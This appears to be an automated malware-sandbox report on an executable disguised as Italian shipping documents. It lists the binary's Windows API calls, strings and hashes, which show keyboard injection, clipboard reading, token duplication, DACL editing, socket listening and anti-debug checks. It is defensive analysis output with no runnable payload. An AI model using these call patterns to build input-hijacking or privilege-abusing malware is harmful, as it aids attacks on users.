                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                        • GetCursorPos.USER32(?), ref: 0047CDC8
                        • ScreenToClient.USER32(?,?), ref: 0047CDD6
                        • GetParent.USER32(00000000), ref: 0047CDF7
                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                        • SendMessageW.USER32 ref: 0047CE93
                        • ClientToScreen.USER32(?,?), ref: 0047CEEE
                        • TrackPopupMenuEx.USER32(?,00000000,?,?,02EE1B88,00000000,?,?,?,?), ref: 0047CF1C
                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                        • SendMessageW.USER32 ref: 0047CF6B
                        • ClientToScreen.USER32(?,?), ref: 0047CFB5
                        • TrackPopupMenuEx.USER32(?,00000080,?,?,02EE1B88,00000000,?,?,?,?), ref: 0047CFE6
                        • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                        • String ID: @GUI_DRAGID$F
                        • API String ID: 3100379633-4164748364
                        APIs
                        • GetForegroundWindow.USER32 ref: 00434420
                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                        • IsIconic.USER32(?), ref: 0043444F
                        • ShowWindow.USER32(?,00000009), ref: 0043445C
                        • SetForegroundWindow.USER32(?), ref: 0043446A
                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                        • GetCurrentThreadId.KERNEL32 ref: 00434485
                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                        • SetForegroundWindow.USER32(00000000), ref: 004344B7
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                        • keybd_event.USER32(00000012,00000000), ref: 004344CF
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                        • keybd_event.USER32(00000012,00000000), ref: 004344E6
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                        • keybd_event.USER32(00000012,00000000), ref: 004344FD
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                        • keybd_event.USER32(00000012,00000000), ref: 00434514
                        • SetForegroundWindow.USER32(00000000), ref: 0043451E
                        • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                        • String ID: Shell_TrayWnd
                        • API String ID: 2889586943-2988720461
                        APIs
                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                        • CloseHandle.KERNEL32(?), ref: 004463A0
                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                        • GetProcessWindowStation.USER32 ref: 004463D1
                        • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                        • _wcslen.LIBCMT ref: 00446498
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • _wcsncpy.LIBCMT ref: 004464C0
                        • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                        • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                        • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,?,?,?,000F01FF,00000400), ref: 00446522
                        • UnloadUserProfile.USERENV(?,?), ref: 00446555
                        • CloseWindowStation.USER32(00000000), ref: 0044656C
                        • CloseDesktop.USER32(?), ref: 0044657A
                        • SetProcessWindowStation.USER32(?), ref: 00446588
                        • CloseHandle.KERNEL32(?), ref: 00446592
                        • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                        • String ID: $@OH$default$winsta0
                        • API String ID: 3324942560-3791954436
                        APIs
                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe,0040F545,C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe,004A90E8,C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe,?,0040F545), ref: 0041013C
                          • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                          • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                          • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                        • _wcscat.LIBCMT ref: 0044BD94
                        • _wcscat.LIBCMT ref: 0044BDBD
                        • __wsplitpath.LIBCMT ref: 0044BDEA
                        • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                        • _wcscpy.LIBCMT ref: 0044BE71
                        • _wcscat.LIBCMT ref: 0044BE83
                        • _wcscat.LIBCMT ref: 0044BE95
                        • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                        • DeleteFileW.KERNEL32(?), ref: 0044BED3
                        • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                        • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                        • DeleteFileW.KERNEL32(?), ref: 0044BF15
                        • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                        • FindClose.KERNEL32(00000000), ref: 0044BF33
                        • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                        • FindClose.KERNEL32(00000000), ref: 0044BF7C
                        Strings
                        Similarity
                        • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                        • String ID: \*.*
                        • API String ID: 2188072990-1173974218
                        APIs
                        • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                        • FindClose.KERNEL32(00000000), ref: 00478924
                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                        • __swprintf.LIBCMT ref: 004789D3
                        • __swprintf.LIBCMT ref: 00478A1D
                        • __swprintf.LIBCMT ref: 00478A4B
                        • __swprintf.LIBCMT ref: 00478A79
                          • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                          • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                        • __swprintf.LIBCMT ref: 00478AA7
                        • __swprintf.LIBCMT ref: 00478AD5
                        • __swprintf.LIBCMT ref: 00478B03
                        Strings
                        Similarity
                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                        • API String ID: 999945258-2428617273
                        APIs
                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                        • __wsplitpath.LIBCMT ref: 00403492
                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                        • _wcscpy.LIBCMT ref: 004034A7
                        • _wcscat.LIBCMT ref: 004034BC
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                          • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                          • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                        • _wcscpy.LIBCMT ref: 004035A0
                        • _wcslen.LIBCMT ref: 00403623
                        • _wcslen.LIBCMT ref: 0040367D
                        Strings
                        • Error opening the file, xrefs: 00428231
                        • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                        • Unterminated string, xrefs: 00428348
                        • _, xrefs: 0040371C
                        Similarity
                        • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                        • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                        • API String ID: 3393021363-188983378
                        APIs
                        • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                        • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                        • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                        • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                        • FindClose.KERNEL32(00000000), ref: 00431B20
                        • FindClose.KERNEL32(00000000), ref: 00431B34
                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                        • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                        • FindClose.KERNEL32(00000000), ref: 00431BCD
                        • FindClose.KERNEL32(00000000), ref: 00431BDB
                        Strings
                        Similarity
                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                        • String ID: *.*
                        • API String ID: 1409584000-438819550
                        APIs
                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                        • __swprintf.LIBCMT ref: 00431C2E
                        • _wcslen.LIBCMT ref: 00431C3A
                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                        Strings
                        Similarity
                        • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                        • String ID: :$\$\??\%s
                        • API String ID: 2192556992-3457252023
                        APIs
                        • GetLocalTime.KERNEL32(?), ref: 004722A2
                        • __swprintf.LIBCMT ref: 004722B9
                        • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                        • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                        • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                        • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                        • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                        • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                        • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                        • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                        • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                        Strings
                        Similarity
                        • API ID: FolderPath$LocalTime__swprintf
                        • String ID: %.3d
                        • API String ID: 3337348382-986655627
                        APIs
                        • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                        • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                        • FindClose.KERNEL32(00000000), ref: 0044291C
                        • FindClose.KERNEL32(00000000), ref: 00442930
                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                        • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                        • FindClose.KERNEL32(00000000), ref: 004429D4
                          • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                        • FindClose.KERNEL32(00000000), ref: 004429E2
                        Strings
                        Similarity
                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                        • String ID: *.*
                        • API String ID: 2640511053-438819550
                        APIs
                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                        • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                        • GetLastError.KERNEL32 ref: 00433414
                        • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                        • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                        • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                        Strings
                        Similarity
                        • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                        • String ID: SeShutdownPrivilege
                        • API String ID: 2938487562-3733053543
                        APIs
                          • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                          • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                          • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                          • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                        • GetLengthSid.ADVAPI32(?), ref: 004461D0
                        • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                        • GetLengthSid.ADVAPI32(?), ref: 00446241
                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                        • CopySid.ADVAPI32(00000000), ref: 00446271
                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                        Similarity
                        • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                        • String ID:
                        • API String ID: 1255039815-0
                        APIs
                        • __swprintf.LIBCMT ref: 00433073
                        • __swprintf.LIBCMT ref: 00433085
                        • __wcsicoll.LIBCMT ref: 00433092
                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                        • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                        • LockResource.KERNEL32(00000000), ref: 004330CA
                        • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                        • LoadResource.KERNEL32(?,00000000), ref: 00433105
                        • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                        • LockResource.KERNEL32(?), ref: 00433120
                        Similarity
                        • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                        • String ID:
                        • API String ID: 1158019794-0
                        • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                        • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                        • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                        • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                        APIs
                        Similarity
                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                        • String ID:
                        • API String ID: 1737998785-0
                        • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                        • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                        • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                        • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                        • GetLastError.KERNEL32 ref: 0045D6BF
                        • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                        Strings
                        Similarity
                        • API ID: Error$Mode$DiskFreeLastSpace
                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                        • API String ID: 4194297153-14809454
                        • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                        • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                        • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                        • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                        APIs
                        Strings
                        Similarity
                        • API ID: _memmove$_strncmp
                        • String ID: @oH$\$^$h
                        • API String ID: 2175499884-3701065813
                        • Opcode ID: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                        • Instruction ID: d0725f23cfd3ca281eac06f76a82abe5967bc3f30214560d9089fed7748fa16d
                        • Opcode Fuzzy Hash: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                        • Instruction Fuzzy Hash: C642E270E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD855AB351D7399946CF55
                        APIs
                        • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                        • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                        • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                        • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                        • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                        • listen.WSOCK32(00000000,00000005), ref: 00465381
                        • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                        • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                        Similarity
                        • API ID: ErrorLast$closesocket$bindlistensocket
                        • String ID:
                        • API String ID: 540024437-0
                        • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                        • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                        • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                        • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                        Strings
                        Similarity
                        • API ID:
                        • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                        • API String ID: 0-2872873767
                        • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                        • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                        • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                        • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                        • __wsplitpath.LIBCMT ref: 00475644
                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                        • _wcscat.LIBCMT ref: 00475657
                        • __wcsicoll.LIBCMT ref: 0047567B
                        • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                        • CloseHandle.KERNEL32(00000000), ref: 004756BA
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                        • String ID:
                        • API String ID: 2547909840-0
                        • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                        • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                        • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                        • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                        APIs
                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                        • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                        • Sleep.KERNEL32(0000000A), ref: 0045250B
                        • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                        • FindClose.KERNEL32(?), ref: 004525FF
                        Strings
                        Similarity
                        • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                        • String ID: *.*$\VH
                        • API String ID: 2786137511-2657498754
                        • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                        • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                        • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                        • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                        APIs
                        • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                        • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                        • TerminateProcess.KERNEL32(00000000), ref: 00422004
                        Strings
                        Similarity
                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                        • String ID: pqI
                        • API String ID: 2579439406-2459173057
                        • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                        • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                        • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                        • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                        APIs
                        • __wcsicoll.LIBCMT ref: 00433349
                        • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                        • __wcsicoll.LIBCMT ref: 00433375
                        • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                        Strings
                        Similarity
                        • API ID: __wcsicollmouse_event
                        • String ID: DOWN
                        • API String ID: 1033544147-711622031
                        • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                        • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                        • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                        • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                        APIs
                        • GetKeyboardState.USER32(?), ref: 0044C3D2
                        • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                        • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                        • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                        • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                        Similarity
                        • API ID: KeyboardMessagePostState$InputSend
                        • String ID:
                        • API String ID: 3031425849-0
                        • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                        • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                        • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                        • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                        APIs
                          • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                        • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                        • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                        Similarity
                        • API ID: ErrorLastinet_addrsocket
                        • String ID:
                        • API String ID: 4170576061-0
                        • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                        • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                        • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                        • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                        APIs
                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                        • IsWindowVisible.USER32 ref: 0047A368
                        • IsWindowEnabled.USER32 ref: 0047A378
                        • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                        • IsIconic.USER32 ref: 0047A393
                        • IsZoomed.USER32 ref: 0047A3A1
                        Similarity
                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                        • String ID:
                        • API String ID: 292994002-0
                        • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                        • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                        • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                        • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                        APIs
                          • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                        • CoInitialize.OLE32(00000000), ref: 00478442
                        • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                        • CoUninitialize.OLE32 ref: 0047863C
                        Strings
                        Similarity
                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                        • String ID: .lnk
                        • API String ID: 886957087-24824748
                        • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                        • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                        • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                        • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                        APIs
                        • OpenClipboard.USER32(?), ref: 0046DCE7
                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                        • GetClipboardData.USER32(0000000D), ref: 0046DD01
                        • CloseClipboard.USER32 ref: 0046DD0D
                        • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                        • CloseClipboard.USER32 ref: 0046DD41
                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                        • GetClipboardData.USER32(00000001), ref: 0046DD8D
                        • CloseClipboard.USER32 ref: 0046DD99
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                        Similarity
                        • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                        • String ID:
                        • API String ID: 15083398-0
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: _memmove
                        • String ID: U$\
                        • API String ID: 4104443479-100911408
                        APIs
                        • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
